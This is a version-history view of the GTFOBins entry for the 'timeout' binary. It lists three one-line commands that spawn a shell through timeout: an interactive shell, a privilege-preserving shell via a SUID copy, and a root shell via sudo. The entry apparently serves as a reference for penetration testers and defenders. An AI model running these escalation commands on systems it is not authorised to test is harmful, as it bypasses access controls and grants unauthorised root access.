GTFOBins.github.io/_gtfobins/timeout.md

10 lines
190 B
Markdown
Raw Normal View History

2018-06-12 16:06:16 +02:00
---
functions:
execute-interactive:
2018-07-16 15:01:50 +02:00
- code: timeout 7d /bin/sh
2018-06-12 16:06:16 +02:00
suid-enabled:
2018-07-16 15:01:50 +02:00
- code: ./timeout 7d /bin/sh -p
2018-07-04 20:26:52 +02:00
sudo-enabled:
2018-07-16 15:01:50 +02:00
- code: sudo timeout --foreground 7d /bin/sh
2018-06-12 16:06:16 +02:00
---